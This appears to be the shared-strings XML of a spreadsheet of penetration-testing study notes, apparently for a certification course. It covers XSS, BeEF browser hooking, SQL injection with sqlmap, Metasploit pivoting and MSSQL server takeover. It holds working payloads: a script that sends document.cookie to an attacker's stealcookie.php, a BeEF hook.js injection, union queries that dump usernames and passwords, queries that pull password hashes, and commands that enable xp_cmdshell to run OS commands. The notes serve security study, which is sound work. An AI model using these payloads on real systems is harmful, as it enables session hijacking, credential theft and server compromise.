A subdomain can set a cookie for the higher domain, but does not work vice versa</t>
    </r>
  </si>
  <si>
    <t>Refer to 1.4.3.1</t>
  </si>
  <si>
    <t>Session</t>
  </si>
  <si>
    <t xml:space="preserve">Sessions are like cookies but set on the server side rather than client side. Sessions variables are stored on the server, cookies are stored on the client browser. 
Works through the use of a session token. 
Session token/ ID is like a primary key that has all the clients associated data, </t>
  </si>
  <si>
    <t>Refer to 1.5.Session</t>
  </si>
  <si>
    <t>Finding XSS</t>
  </si>
  <si>
    <t xml:space="preserve">We can attempt to inject HTML or JS into the input. 
Input means the following:
- GET/POST vairables
- COOKIE variables
- HTTP Headers </t>
  </si>
  <si>
    <t>If user input is part of the output of a webpage and it is unsantitised, there is potential for XSS.</t>
  </si>
  <si>
    <t>Finding XSS - Process</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1. Browse the web application and attempt to inject html into the input paramter of the url and every parameter that is found to be part of the web application.  
Use a simple payload like </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">&lt;plaintext&gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-&gt; this will tell the browser to treat the webpage as plain text, making the site look weird. 
i.e. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">victim.site/pages/details.php?band=&lt;plaintext&gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">if site looks weird it is vulnerable 
2. Check the possibility of injecting scripts using the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">&lt;script&gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">tag. </t>
    </r>
  </si>
  <si>
    <t>Finding XSS - Source Code</t>
  </si>
  <si>
    <t>Exploiting XSS - Cookie Stealing</t>
  </si>
  <si>
    <r>
      <t>Process:
1. Read the cookie using JS
2. Redirect the cookie content to a server that we own
3. Retrieve the logged cookie from our server and install it on our browser using A&amp;C cookie editor. 
i.e. Http://alice.xxx/members/search.php?kw=</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">&lt;script&gt;var i=new Image();i.src="&lt;attackersite/stealcookie.php?=q"%2bdocument.cookie;&lt;/script&gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">The bold area we are creating an image object and setting its source to our attacker controlled php script. 
%2b = + , we are inputting the cookie (document.cookie) into the query string of the stealcookie.php script. </t>
    </r>
  </si>
  <si>
    <t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet
IF &lt;script&gt;&lt;/script&gt; does not work just try &lt;img src = page/ Javascript function i.e. Javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>Beef</t>
  </si>
  <si>
    <t xml:space="preserve">Process to get a shell via Beef:
1. Start up beef
2. Find an XSS vul, stored/ reflected/ DOM
3. In the input parameter i.e. the comments field, input the bwlo:
&lt;script src="http:&lt;our_ip&gt;:&lt;port beef is listening on&gt;/hook.js"&gt;&lt;/script&gt;
*NOTE: The above url in the src can be found in the config.yaml file. 
4. When a user visits the site/ url, we will get a connection on our beef panel
5. To get a shell, follow the below link
https://null-byte.wonderhowto.com/how-to/exploiting-xss-with-beef-part-3-0161812/ 
6. OR investigate what plugins are available on the target via Get System (under commands tab) Info in beef. Search for an exploit related to the plugin. 
OR just use browser_autopwn exploit if cannot detect plugins etc
</t>
  </si>
  <si>
    <t>Browser exploitation framework. 
cd /etc/beef-xss/
cd /usr/share/beef-xss/
Change yaml file according to the video. 
https://community.elearnsecurity.com/topic/6791-lab-27-hooked-browser-is-edge-not-ie-no-java/</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>SQLi attack exploits the injection of SQL commands into the SQL queries of a web application. 
Can access and manipulate a web apps backend database. 
Connectors are used to connect the DB to the web application</t>
  </si>
  <si>
    <t xml:space="preserve">Instead, we can bypass uac by downloading a uac payload and compiling it and uploading it to the system.
1. Identify OS and version
2. Search for bypass exploits on exploit-db etc
3. Upload and compile on target machine
4. Check video priv esc for more. </t>
  </si>
  <si>
    <t>Enumerate Applications</t>
  </si>
  <si>
    <t>meterpreter -&gt; run post/windows/gather/enum_applications</t>
  </si>
  <si>
    <t>Check all installed applications on a box</t>
  </si>
  <si>
    <t>WMIC</t>
  </si>
  <si>
    <t>Use wmic, also check firewall rules on machine etc</t>
  </si>
  <si>
    <t>DNS Cache</t>
  </si>
  <si>
    <t>ipconfig /displaydns</t>
  </si>
  <si>
    <t>Display DNS Cache/ can be used to find more machines in the network</t>
  </si>
  <si>
    <t>Multiple Networks</t>
  </si>
  <si>
    <t>1. Setup an autoroute from 11.11 to 10.10 
use post/windows/manage/autoroute
set SESSION 1 (your session on the 10.10 network box)
set SUBNET 10.10.11.11 (the second network)
OR
route add &lt;internal ip u wanna hit&gt; &lt;subnet (255.255.255.0)&gt; &lt;session i.e. 1&gt;
2. Setup an autroute on 10.10
set SUBNET 10.10.10.10
set SESSION 1 (same session)
3. Setup exploit to listen on victim 1 (10.10.10.10)
set LHOST 10.10.10.10 in the reverse meterpreter tcp payload options
-&gt; metasploit will use this as a proxy for all communications
4. Exploit box on 11.11
-&gt; 11.11 will connect to 10.10 and 10.10 will connect to us with the 11.11 meterpreter session</t>
  </si>
  <si>
    <t xml:space="preserve">We may come across multiple networks that our attacker machine does not have direct connection with. For example, we have popped box 1 sitting on *.10.10. Box 1 has a connection to a number of other boxes in 10.10 and also a box on another network *.11.11, which our machine cannot communicate with at all. Below is a brief explanation as to how we can scan and compromise all the boxes on 10.10 and 11.11.
</t>
  </si>
  <si>
    <t>Curl</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">To find what cms or app is running on a webserver, just </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">curl </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">the site in cmdline and it should respond with the webpage. </t>
    </r>
  </si>
  <si>
    <t>SQL Syntax</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">SELECT &lt;columns_list&gt; FROM &lt;table&gt; WHERE &lt;condition&gt;;
SELECT name, description FROM products WHERE id=9;
The above = select the name and description fields from the products table where the id is 9. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>UNION</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> = performs a union between two results. Implies DISTINCT by default, use </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">ALL </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">to remove this feature.  
&lt;SELECT statement&gt; UNION &lt;other select statement&gt; -&gt; without duplicates
&lt;SELECT statement&gt; UNION ALL &lt;other select statement&gt; -&gt; with duplicates
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">DUPLICATE </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">= can filter out duplicate entities/ results 
SELECT DISTINCT &lt;field&gt; FROM etc...
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Comments </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">= '-- ' (ensure you follow with a space for the comment) or '#' 
SELECT field FROM table; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>--</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>comment</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
*Notes:
All sql queries end with </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">We can select constant values -&gt; 22, 'string', 0x12 (unicode); etc...
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">https://www.sqltutorial.org/sql-cheat-sheet/
https://www.w3schools.com/sql/sql_intro.asp
https://docs.microsoft.com/en-us/sql/t-sql/data-types/constants-transact-sql?view=sql-server-ver15
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Check slide 4.1.2 for example of a database connection using PHP</t>
    </r>
  </si>
  <si>
    <t>Vulnerable Queries</t>
  </si>
  <si>
    <r>
      <t>Example:
SELECT name, description FROM Products WHERE ID=</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">'' OR 'a'='a';
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">The above tells the db to select the conditions: 
- the id must be empty (id='')
- OR an always true condition ('a'='a')
While the first condition is not met, the second condition is always true, and will select all items from the Products table. 
Can also exploit the UNION command:
SELECT name, description FROM Products WHERE ID='' UNION SELECT Username, password, FROM Accounts WHERE 'a'='a';
The above asks the db to select the items with an empty id (thus selecting nothing) then performing a UNION with all the accounts fields. </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">Queries are vulnerable where the query is dynamic, i.e. The user can input a value which is then plugged into the query statement on the connection code file. </t>
  </si>
  <si>
    <t>In-Band SQLi</t>
  </si>
  <si>
    <t>In-band = leverage the same channel used to inject the SQL code (i.e. The pages generated by the web application)
I.e. Querying the web app - ask the webapp who the users are</t>
  </si>
  <si>
    <t>Error-Based SQLi</t>
  </si>
  <si>
    <t xml:space="preserve">Tries to force the DBMS to output an error, the error can be used to perform data exfiltration. </t>
  </si>
  <si>
    <t>Blind SQLi</t>
  </si>
  <si>
    <t xml:space="preserve">Does not reflect the results of the injection on the output. 
Data is extracted via true/ false conditions. </t>
  </si>
  <si>
    <t>Finding SQLi - Errors in Web Apps</t>
  </si>
  <si>
    <t xml:space="preserve">Database inputs may be on a form or directly from the URL as a GET request (i.e. Www.xyz.com/query.php?id=1)
In the input area try the below and check for an ERROR output:
- Strings terminators 'and'
- SQL commands: SELECT, UNION etc
- SQL comments: # or -- 
If we see an error, most likely vulnerable. 
Example:
/view.php?id=1' -&gt; here we are appending a single quote to the end of the id value -&gt; if we get an error, there is injection vulnerability. 
Then, try /view.php?id=1; -- - -&gt; if we get the same result as /view.php?id=1, then it is vulnerable and we can inject commands. 
In a form, just put a single quote into the field and hit enter. If we get error, that field is vulnerable. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Check the video for all examples. </t>
  </si>
  <si>
    <t>Finding SQLi - Boolean Based Detection</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Try to craft payloads/ queries that tranform the web app queries into True/False conditions. 
Process: 
1. Input a </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">TRUE </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">condition. i.e. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">/view.php?id=999999' or '1'='1
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">If it is an integer value (i.e. 99999' does not work) just try 99999 without the ending single quote. 
The above should output a result from the db as the or statement is true. 
NOTE, DO THIS IN BURP AND URL ENCODE THE SPACES (%20)
2. Try a </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">FALSE </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">condition i.e. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">/view.php?id=999999' or '1'='2
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Above is false and should return no results at all and no errors. 
3. We can confirm that SQLi works. 
NOTE: TO BE THOROUGH, WE NEED TO TEST HEADER (COOKIE VALUE), GET AND POST VALUES IN A WEB PAGE!
ALSO TRY WITH DOUBLE QUOTES
TRy closing parenthesis if does not work. i.e. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">username-') or 1=1; -- </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">If a web app does not diplay errors, we can still test for SQLi using boolean based detection.
https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/ 
</t>
  </si>
  <si>
    <t>Exploiting SQLi - In-Band/ Union Based</t>
  </si>
  <si>
    <r>
      <t>General Example:
/php.file?id=</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">&lt;invalidID i.e. 9999&gt;' UNION &lt;your injection&gt;; -- - </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
The output will skip the first query as it is invalid, then display our injection query. 
*In-Band CONDITIONS: Query will not work if the below is not met
1) Field types in the second query need to match the first query
2) Number of fields in the second query need to match the first query
3) We need to know the TABLE AND COLUMN names to perform this attack
*Solutions to the above:
1) Enumerating the Number of Fields in a Query:
Start with a single field, then increase the number until we build a valid query (until the error disappears).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">9999' UNION SELECT NULL; -- - 
9999' UNION SELECT NULL, NULL; -- - etc
If the web app does not display an error, enter a valid id (not 9999), then try. 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">2) Enumerating Field Types:
After finding the number of fields, substitute the first NULL for an integer i.e. 1 
If no error is thrown on this, we can continue. Try an integer in the second NULL i.e.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>' UNION SELECT 1, null; -- -</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
If error is thrown just try a string i.e. 'a'
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">' UNION SELECT 1, 'a'; -- - 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">3) CHECK
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>Utilises the UNION statement to extract data. 
Ptp 4.3.4.1.</t>
  </si>
  <si>
    <t>Comments</t>
  </si>
  <si>
    <t xml:space="preserve">We use comments is sql injection to essentially stop the query right after our query. This comments out any other SQL code which could follow our injection point. If we didnt do this, it could mess up our injecion. </t>
  </si>
  <si>
    <t>DBMS Version</t>
  </si>
  <si>
    <t>9999' UNION SELECT @@version, &lt;remaining field types and number&gt;</t>
  </si>
  <si>
    <t>Cheat Sheets</t>
  </si>
  <si>
    <t>MS SQL - pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
MySQL - http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
Postgres - http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Exploiting SQLi - Error Based </t>
  </si>
  <si>
    <t xml:space="preserve">The error contains the information that we are looking for. </t>
  </si>
  <si>
    <t>MS SQL</t>
  </si>
  <si>
    <t>Exploiting SQLi - Blind</t>
  </si>
  <si>
    <t>sqmap -u &lt;vulnerable_url&gt; -p &lt;injection_parameter&gt; [options] --cookie="PHPSESSID=" ...
Process:
0. Find a SQLi injection point
Navigate through the site, try to find a parameter. 
Setup -u -&gt; URL and the vulnerable input parameter -&gt; check help menu on sqlmap
1. Grab the database banner
sqlamp -u "&lt;target&gt;" --banner
2. List users of the database
sqlmap -u "&lt;target&gt;" --users
3. Check if the web app database user is a database admin
sqlmap -u "&lt;target&gt;" --is-dba 
4. Extract the available databases
sqlmap -u "&lt;target&gt;" --dbs 
5. Extract the chosen database schema (list all the tables)
sqlmap -u "&lt;target&gt;" -D &lt;database&gt; --tables
6. List all columns of chosen table
sqlmap -u "&lt;target&gt;" -D &lt;database&gt; -T &lt;table1, table2 etc.) --columns
7. Dump all columns you need
sqlmap -u "&lt;target&gt;" -D &lt;database&gt; -T &lt;table&gt; -C &lt;columns list&gt; --dump</t>
  </si>
  <si>
    <t>SQL Map can be used to detect and exploit SQL injections. 
https://pentestlab.blog/2012/11/24/owning-the-database-with-sqlmap/
https://medium.com/hacker-toolbelt/dvwa-1-9-viii-blind-sql-injection-with-sqlmap-ee8d59fbdea7
https://www.programmersought.com/article/5028741072/
https://www.programmersought.com/article/82313563689/
https://wargame.braincoke.fr/labs/dvwa/dvwa-sqli/
https://portswigger.net/web-security/sql-injection</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Specify the DBMS manually if sqlmap fails at detecting it: (check 4.6.8.1)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">sqlmap --dbms=&lt;DBMS&gt;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Specify injection technique (blind, union etc.) 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--technique=U
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">If the web app changes its output, and sqlmap cannot figure it out, use the below (i.e. Blind injection will not work):
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--string = this will always be present in TRUE output pages
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>i.e. site.php?id=1' --string "nokia"</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
--not-string = a string which is always present in FALSE output pages
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">SQLi can be performed on any client side input:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">sqlmap --level &lt;input field&gt;
i.e. cookie header = values 2
User agent and referrer = headers 3
Host header = header 5
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Risk levels: use this to be stealthy/ less chance of blowing the server up
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--risk &lt;level i.e. 1&gt; 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Keep alive - SQL queries take a while, use the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--keep-alive </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">switch to keep the connection alive. 
Increase threads via </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--threads &lt;number 1-10&gt;
--crawl=1 to crawl the site for input parameters.
We can also try SQLi on login pages where creds are posted. 
--nocast -&gt; no payload casting - CHECK
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>SQL Map Advanced techniques
Technique Flags:
U = Union 
B = Blind boolean
https://medium.com/@shahjerry33/blind-sql-injection-cb68864b8361
https://security.stackexchange.com/questions/207267/how-do-i-use-sqlmap-to-dump-the-owasp-juice-shop-schema
https://dl.packetstormsecurity.net/papers/cheatsheets/sqlmap-cheatsheet-1.0-SDB.pdf
https://medium.com/@SwiftSafe/how-to-perform-manual-sql-injection-while-pentesting-with-single-quote-error-based-parenthesis-9b5668e127ad</t>
  </si>
  <si>
    <t>SQLi to Server Takeover - MSSQL Server</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Process:
1. Obtain the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">sa </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">account password. Crack the SHA-1 hash of the password and then access the db as a legitimate db user. Run the below queries to obtain the username and password hash
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>SELECT name, password FROM master..sysxlogins -&gt; MSSQL Server 2000 
SELECT name, password_hash FROM master.sys.sql_logins -&gt; MSSQL Server &gt;=2005</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
2. As </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">sa </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">user, run the below command to run any OS command:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">EXEC master..xp_cmdshell '&lt;command&gt;;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">3. xp_cmdshell is not enabled by default, we need to enable it, issue the below commands:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">4. Internal Network Host Enumeration:
a. Issue a ping command
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">EXEC master.dbo.xp_cmdshell 'ping &lt;target_ip&gt;'
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">b. Port scan the internal network. We can use OPENROWSET to do so.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">SELECT * FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=&lt;password&gt;;NETWORK=DBMSSOCN;Address=&lt;target_ip&gt;,&lt;target_port&gt;;timeout=&lt;connection timeout in seconds&gt;','select 1')--
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">If we get 'SQL Server does not exist or access denied' -&gt; Port is closed
Open = 'general network erro. Check your network documentation'
If errors are hidden and the port is closed = 'connection timeout in seconds value'
5. Reading the File System
Do so by lauching the dir command:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">EXEC master..xp_cmdshell 'dir &lt;target directory&gt;'
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
